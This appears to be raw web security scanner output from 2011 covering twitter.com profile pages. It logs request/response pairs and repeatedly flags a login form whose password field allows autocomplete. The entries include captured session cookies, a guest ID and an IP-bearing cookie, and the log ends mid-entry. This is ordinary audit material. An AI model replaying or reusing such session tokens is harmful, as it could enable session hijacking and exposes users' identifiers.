HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:30 GMT Server: hi Status: 200 OK X-Transaction: 1296225029-56076-61608 ETag: "241ca6186e49f64c12f595a689635dc8" Last-Modified: Fri, 28 Jan 2011 14:30:29 GMT X-Runtime: 0.64571 Content-Type: text/html; charset=utf-8 Content-Length: 49758 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiBodHRwOi8vdHdpdHRlci5jb20vYmVubmFkZWw6%250ADGNzcmZfaWQiJTEyNDM3NmU5Zjg3ODYwNmJiMWM2YjQ0MzhhNmM0NTM5Og9j%250AcmVhdGVkX2F0bCsIM07wzC0BOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRh%250AZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNo%250AOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--d2adbee25df14d0172349a6c3fd5e58e45975083; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /cowboy HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:00 GMT Server: hi Status: 200 OK X-Transaction: 1296225060-85333-1036 ETag: "257ca8de3359b561c58908e572d9840c" Last-Modified: Fri, 28 Jan 2011 14:31:00 GMT X-Runtime: 0.01434 Content-Type: text/html; charset=utf-8 Content-Length: 52646 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /creationix HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:38 GMT Server: hi Status: 200 OK X-Transaction: 1296225038-68082-17773 ETag: "b84f4f9cc8d7f0be4a449ccb6ba5ef8c" Last-Modified: Fri, 28 Jan 2011 14:30:38 GMT X-Runtime: 0.01145 Content-Type: text/html; charset=utf-8 Content-Length: 52514 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /dandenney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:59 GMT Server: hi Status: 200 OK X-Transaction: 1296225059-14036-20243 ETag: "b216b5fbcf2d794e1118d2a88b30a946" Last-Modified: Fri, 28 Jan 2011 14:30:59 GMT X-Runtime: 0.01217 Content-Type: text/html; charset=utf-8 Content-Length: 54426 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /danwrong HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:44 GMT Server: hi Status: 200 OK X-Transaction: 1296225044-52425-1613 ETag: "e308391ad5a4a27e5094e4fd0c33693a" Last-Modified: Fri, 28 Jan 2011 14:30:44 GMT X-Runtime: 0.01151 Content-Type: text/html; charset=utf-8 Content-Length: 50051 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /davevogler HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:46 GMT Server: hi Status: 200 OK X-Transaction: 1296225046-53952-21746 ETag: "2ad3827a054ebfaafa3ae7d33a059d42" Last-Modified: Fri, 28 Jan 2011 14:30:46 GMT X-Runtime: 0.01106 Content-Type: text/html; charset=utf-8 Content-Length: 53247 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /dougneiner HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:13 GMT Server: hi Status: 200 OK X-Transaction: 1296225073-41249-57241 ETag: "a0613392b43e537b2e040e0724b95bf7" Last-Modified: Fri, 28 Jan 2011 14:31:13 GMT X-Runtime: 0.01266 Content-Type: text/html; charset=utf-8 Content-Length: 53641 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /ebello HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225040-69634-53816 ETag: "ec4d064b3111971c1cbbd076806b6c98" Last-Modified: Fri, 28 Jan 2011 14:30:40 GMT X-Runtime: 0.01003 Content-Type: text/html; charset=utf-8 Content-Length: 54961 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /ericmmartin HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:43 GMT Server: hi Status: 200 OK X-Transaction: 1296224922-26410-25724 ETag: "b52f4470d0eb7102204e56e131ce2f8f" Last-Modified: Fri, 28 Jan 2011 14:28:42 GMT X-Runtime: 0.50069 Content-Type: text/html; charset=utf-8 Content-Length: 58034 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIiNodHRwOi8vdHdpdHRlci5jb20vZXJpY21tYXJ0%250AaW46DGNzcmZfaWQiJTgyOTI5MWZkOGU2YmQxN2QxYTRkYzlmMDFlZjViZDVk%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE%253D--aec68d2fd0935035e3877d8879d09c5b64c00398; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /gercheq HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:31:17 GMT Server: hi Status: 200 OK X-Transaction: 1296225077-54075-30524 ETag: "4793986d74da0ff9abc545ba99de39af" Last-Modified: Fri, 28 Jan 2011 14:31:17 GMT X-Runtime: 0.27545 Content-Type: text/html; charset=utf-8 Content-Length: 51283 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /j_hollender HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:16 GMT Server: hi Status: 200 OK X-Transaction: 1296225016-34363-18254 ETag: "ff41031bc88714d0c96acba56a4b58e3" Last-Modified: Fri, 28 Jan 2011 14:30:16 GMT X-Runtime: 0.01703 Content-Type: text/html; charset=utf-8 Content-Length: 50673 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /joemccann HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:40 GMT Server: hi Status: 200 OK X-Transaction: 1296225039-24458-21657 ETag: "2185bda414323413d07c805828e8deaa" Last-Modified: Fri, 28 Jan 2011 14:30:39 GMT X-Runtime: 0.01186 Content-Type: text/html; charset=utf-8 Content-Length: 50599 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /lapubell HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:26 GMT Server: hi Status: 200 OK X-Transaction: 1296225026-90981-8371 ETag: "aa94e1eda1d46648c91aba85f6351309" Last-Modified: Fri, 28 Jan 2011 14:30:26 GMT X-Runtime: 0.00798 Content-Type: text/html; charset=utf-8 Content-Length: 38074 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /login HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:36 GMT Server: hi Status: 200 OK X-Transaction: 1296224736-89084-19137 ETag: "849e44ccdc2da8651621c818bd6cc65c" Last-Modified: Fri, 28 Jan 2011 14:25:36 GMT X-Runtime: 0.03302 Content-Type: text/html; charset=utf-8 Content-Length: 12714 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlYzhmZTI4YjQwNmVmYjgxZGY5YWI0MGFkNWYyNjIx%250AOWI6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--54109c50eed6759247aa1ca10510e42039e66977; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... <div class="wrapper">
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
GET /malsup/favorites HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:31 GMT Server: hi Status: 200 OK X-Transaction: 1296224911-48509-36720 ETag: "aa813f25e26e58a8fc00a80271530b6f" Last-Modified: Fri, 28 Jan 2011 14:28:31 GMT X-Runtime: 0.28607 Content-Type: text/html; charset=utf-8 Content-Length: 57347 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToMY3NyZl9pZCIlOWM3MDM0NDIyYzY2M2ZkMzM0YWE1NDgwMzg1NWRh%250AM2U6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--316ed1acac7dec68e9460d11f94a8de8f6191911; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
The page contains a form with the following action URL:
https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
session[password]
Request
